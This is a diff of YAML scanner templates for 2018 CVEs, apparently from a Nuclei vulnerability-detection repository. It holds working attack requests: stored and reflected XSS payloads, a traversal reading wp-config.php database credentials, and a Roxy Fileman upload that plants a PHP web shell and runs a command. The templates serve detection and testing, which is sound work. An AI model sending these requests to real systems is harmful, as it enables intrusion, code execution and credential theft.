+        new_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=
+
+      - |
+        GET /assets/account-owners.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(all_headers_3, "text/html")'
+          - "contains(body_3, '><script>alert(document.domain)</script></a>')"
+        condition: and
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19751.yaml b/cves/2018/CVE-2018-19751.yaml
new file mode 100644
index 0000000000..52342c68d5
--- /dev/null
+++ b/cves/2018/CVE-2018-19751.yaml
@@ -0,0 +1,62 @@
+id: CVE-2018-19751
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
+  reference:
+    - https://www.exploit-db.com/exploits/45947/
+    - https://github.com/domainmod/domainmod/issues/83
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-19751
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2018,domainmod,xss,authenticated,edb
+
+requests:
+  - raw:
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /admin/ssl-fields/add.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test
+
+      - |
+        GET /admin/ssl-fields/ HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(document.domain)</script></a>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19752.yaml b/cves/2018/CVE-2018-19752.yaml
new file mode 100644
index 0000000000..b24c063097
--- /dev/null
+++ b/cves/2018/CVE-2018-19752.yaml
@@ -0,0 +1,61 @@
+id: CVE-2018-19752
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
+  reference:
+    - https://github.com/domainmod/domainmod/issues/84
+    - https://www.exploit-db.com/exploits/45949/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-19752
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2018,domainmod,xss,authenticated,edb
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /assets/add/registrar.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test
+
+      - |
+        GET /assets/registrars.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(document.domain)</script></a>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19753.yaml b/cves/2018/CVE-2018-19753.yaml
index fe48eeb977..71b9d24fd3 100644
--- a/cves/2018/CVE-2018-19753.yaml
+++ b/cves/2018/CVE-2018-19753.yaml
@@ -1,19 +1,22 @@
 id: CVE-2018-19753
 
 info:
-  name: Tarantella Enterprise Directory Traversal
+  name: Tarantella Enterprise <3.11 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Tarantella Enterprise versions prior to 3.11 suffer from a directory traversal vulnerability.
+  description: |
+    Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.
   reference:
     - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
-    - https://www.cvedetails.com/cve/CVE-2018-19753
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19753
+    - http://seclists.org/fulldisclosure/2018/Nov/66
+    - http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-19753
     cwe-id: CWE-22
-  tags: cve,cve2018,tarantella,lfi
+  tags: packetstorm,seclists,cve,cve2018,tarantella,lfi
 
 requests:
   - method: GET
@@ -30,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/13
diff --git a/cves/2018/CVE-2018-19877.yaml b/cves/2018/CVE-2018-19877.yaml
new file mode 100644
index 0000000000..2feb8e4312
--- /dev/null
+++ b/cves/2018/CVE-2018-19877.yaml
@@ -0,0 +1,43 @@
+id: CVE-2018-19877
+
+info:
+  name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
+  reference:
+    - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
+    - https://www.exploit-db.com/exploits/45958/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19877
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-19877
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: adiscon,xss,edb,cve,cve2018
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'value=""><script>confirm(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19892.yaml b/cves/2018/CVE-2018-19892.yaml
new file mode 100644
index 0000000000..9a9cdde683
--- /dev/null
+++ b/cves/2018/CVE-2018-19892.yaml
@@ -0,0 +1,61 @@
+id: CVE-2018-19892
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
+  reference:
+    - https://www.exploit-db.com/exploits/45959
+    - https://github.com/domainmod/domainmod/issues/85
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19892
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-19892
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve2018,domainmod,xss,authenticated,edb,cve
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /admin/dw/add-server.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=
+
+      - |
+        GET /admin/dw/servers.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 3
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(document.domain)</script></a>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19914.yaml b/cves/2018/CVE-2018-19914.yaml
new file mode 100644
index 0000000000..af02ee0b34
--- /dev/null
+++ b/cves/2018/CVE-2018-19914.yaml
@@ -0,0 +1,54 @@
+id: CVE-2018-19914
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
+  reference:
+    - https://www.exploit-db.com/exploits/46375/
+    - https://github.com/domainmod/domainmod/issues/87
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19914
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-19914
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve2018,domainmod,xss,authenticated,edb,cve
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /assets/add/dns.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+
+      - |
+        GET /assets/dns.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(all_headers_3, "text/html")'
+          - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
+        condition: and
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19915.yaml b/cves/2018/CVE-2018-19915.yaml
new file mode 100644
index 0000000000..a15d397483
--- /dev/null
+++ b/cves/2018/CVE-2018-19915.yaml
@@ -0,0 +1,54 @@
+id: CVE-2018-19915
+
+info:
+  name: DomainMOD <=4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field.
+  reference:
+    - https://github.com/domainmod/domainmod/issues/87
+    - https://www.exploit-db.com/exploits/46376/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19915
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-19915
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+  tags: domainmod,xss,authenticated,edb,cve,cve2018
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /assets/add/host.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test
+
+      - |
+        GET /assets/hosting.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(all_headers_3, "text/html")'
+          - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
+        condition: and
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2018/CVE-2018-20009.yaml b/cves/2018/CVE-2018-20009.yaml
new file mode 100644
index 0000000000..7596d057d1
--- /dev/null
+++ b/cves/2018/CVE-2018-20009.yaml
@@ -0,0 +1,54 @@
+id: CVE-2018-20009
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.
+  reference:
+    - https://github.com/domainmod/domainmod/issues/88
+    - https://www.exploit-db.com/exploits/46372/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20009
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-20009
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+  tags: domainmod,xss,authenticated,edb,cve,cve2018
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /assets/add/ssl-provider.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=
+
+      - |
+        GET /assets/ssl-providers.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(all_headers_3, "text/html")'
+          - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
+        condition: and
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2018/CVE-2018-20010.yaml b/cves/2018/CVE-2018-20010.yaml
new file mode 100644
index 0000000000..cae5c83fa5
--- /dev/null
+++ b/cves/2018/CVE-2018-20010.yaml
@@ -0,0 +1,54 @@
+id: CVE-2018-20010
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field.
+  reference:
+    - https://www.exploit-db.com/exploits/46373/
+    - https://github.com/domainmod/domainmod/issues/88
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20010
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-20010
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+  tags: domainmod,xss,authenticated,edb,cve,cve2018
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /assets/add/ssl-provider-account.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=
+
+      - |
+        GET /assets/ssl-accounts.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(all_headers_3, "text/html")'
+          - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
+        condition: and
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2018/CVE-2018-20011.yaml b/cves/2018/CVE-2018-20011.yaml
new file mode 100644
index 0000000000..a0245139b1
--- /dev/null
+++ b/cves/2018/CVE-2018-20011.yaml
@@ -0,0 +1,54 @@
+id: CVE-2018-20011
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters.
+  reference:
+    - https://www.exploit-db.com/exploits/46374/
+    - https://github.com/domainmod/domainmod/issues/88
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20011
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-20011
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+  tags: domainmod,xss,authenticated,edb,cve,cve1028
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /assets/add/category.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=
+
+      - |
+        GET /assets/categories.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_3 == 200'
+          - 'contains(all_headers_3, "text/html")'
+          - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
+        condition: and
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml
index a4e24421a8..ae7cc794c1 100644
--- a/cves/2018/CVE-2018-20462.yaml
+++ b/cves/2018/CVE-2018-20462.yaml
@@ -1,11 +1,13 @@
 id: CVE-2018-20462
 
 info:
-  name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress JSmol2WP <=1.07 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
+  description: WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
   reference:
+    - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS
+    - https://wpvulndb.com/vulnerabilities/9196
     - https://nvd.nist.gov/vuln/detail/CVE-2018-20462
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/11
diff --git a/cves/2018/CVE-2018-20463.yaml b/cves/2018/CVE-2018-20463.yaml
new file mode 100644
index 0000000000..edd0c33519
--- /dev/null
+++ b/cves/2018/CVE-2018-20463.yaml
@@ -0,0 +1,44 @@
+id: CVE-2018-20463
+
+info:
+  name: JSmol2WP <= 1.07 - Directory Traversal
+  author: vinit989
+  severity: high
+  description: |
+    An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.
+  reference:
+    - https://wpscan.com/vulnerability/9197
+    - https://wordpress.org/plugins/jsmol2wp/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20463
+    - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-amp-SSRF
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2018-20463
+    cwe-id: CWE-22
+  metadata:
+    verified: "true"
+  tags: wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'DB_USER',"
+          - "'DB_PASSWORD'"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/plain
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2018/CVE-2018-20470.yaml b/cves/2018/CVE-2018-20470.yaml
index b5d8f69059..104953b28b 100644
--- a/cves/2018/CVE-2018-20470.yaml
+++ b/cves/2018/CVE-2018-20470.yaml
@@ -1,20 +1,21 @@
 id: CVE-2018-20470
 
 info:
-  name: Sahi pro 7.x/8.x - Directory Traversal
+  name: Tyto Sahi pro 7.x/8.x - Local File Inclusion
   author: daffainfo
   severity: high
-  description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view
-    contents of sensitive files.
+  description: |
+    Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.
   reference:
     - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
-    - https://www.cvedetails.com/cve/CVE-2018-20470
+    - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20470
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-20470
     cwe-id: CWE-22
-  tags: cve,cve2018,lfi
+  tags: cve,cve2018,lfi,packetstorm
 
 requests:
   - method: GET
@@ -23,13 +24,16 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: word
+        part: body
         words:
           - "bit app support"
           - "fonts"
           - "extensions"
         condition: and
-        part: body
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2018/CVE-2018-20526.yaml b/cves/2018/CVE-2018-20526.yaml
new file mode 100644
index 0000000000..2a14e6a544
--- /dev/null
+++ b/cves/2018/CVE-2018-20526.yaml
@@ -0,0 +1,80 @@
+id: CVE-2018-20526
+
+info:
+  name: Roxy Fileman 1.4.5 - Unrestricted File Upload
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Roxy Fileman 1.4.5 allows unrestricted file upload in upload.php.
+  reference:
+    - http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html
+    - https://www.exploit-db.com/exploits/46085/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20526
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20526
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2018-20526
+    cwe-id: CWE-434
+  metadata:
+    google-query: intitle:"Roxy file manager"
+    verified: "true"
+  tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
+
+requests:
+  - raw:
+      - |
+        POST /php/upload.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+
+        ------WebKitFormBoundary20kgW2hEKYaeF5iP
+        Content-Disposition: form-data; name="action"
+
+        upload
+        ------WebKitFormBoundary20kgW2hEKYaeF5iP
+        Content-Disposition: form-data; name="method"
+
+        ajax
+        ------WebKitFormBoundary20kgW2hEKYaeF5iP
+        Content-Disposition: form-data; name="d"
+
+        /Uploads
+        ------WebKitFormBoundary20kgW2hEKYaeF5iP
+        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php7"
+        Content-Type: application/octet-stream
+
+        <?php
+        echo exec($_GET["cmd"]);
+        ?>
+
+        ------WebKitFormBoundary20kgW2hEKYaeF5iP--
+
+      - |
+        GET /Uploads/{{randstr}}.php7?cmd=echo+"roxyfileman"+|+rev HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "namelifyxor"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2018/CVE-2018-20824.yaml b/cves/2018/CVE-2018-20824.yaml
index 2e75d666fc..608116947f 100644
--- a/cves/2018/CVE-2018-20824.yaml
+++ b/cves/2018/CVE-2018-20824.yaml
@@ -1,17 +1,20 @@
 id: CVE-2018-20824
 
 info:
-  name: Atlassian Jira WallboardServlet XSS
+  name: Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
-  description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
+  description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.
   reference:
     - https://jira.atlassian.com/browse/JRASERVER-69238
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20824
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2018-20824
     cwe-id: CWE-79
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2018,atlassian,jira,xss
 
 requests:
@@ -27,3 +30,5 @@ requests:
         regex:
           - (?mi)timeout:\salert\(document\.domain\)
         part: body
+
+# Enhanced by mp on 2022/08/10
diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml
index 920686afb2..356ea84e7e 100644
--- a/cves/2018/CVE-2018-2392.yaml
+++ b/cves/2018/CVE-2018-2392.yaml
@@ -1,23 +1,24 @@
 id: CVE-2018-2392
 
 info:
-  name: SAP Internet Graphics Server (IGS) XML External Entity
+  name: SAP Internet Graphics Server (IGS) - XML External Entity Injection
   author: _generic_human_
   severity: high
   description: |
-    SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
+    SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
   reference:
     - https://launchpad.support.sap.com/#/notes/2525222
     - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/
     - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/
     - https://troopers.de/troopers18/agenda/3r38lr/
     - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-2392
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
     cvss-score: 7.5
     cve-id: CVE-2018-2392
     cwe-id: CWE-611
-  tags: cve,cve2018,sap,igs,xxe,xmlchart
+  tags: cve,cve2018,sap,igs,xxe,xmlchart,msf
 
 requests:
   - raw:
@@ -87,3 +88,5 @@ requests:
           - "SAP Internet Graphics Server"
         part: header
         condition: and
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml
index 6e863bfa8b..e2976335fb 100644
--- a/cves/2018/CVE-2018-2628.yaml
+++ b/cves/2018/CVE-2018-2628.yaml
@@ -9,12 +9,14 @@ info:
   reference:
     - https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628
     - https://nvd.nist.gov/vuln/detail/CVE-2018-2628
+    - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
+    - http://web.archive.org/web/20211207132829/https://securitytracker.com/id/1040696
   classification:
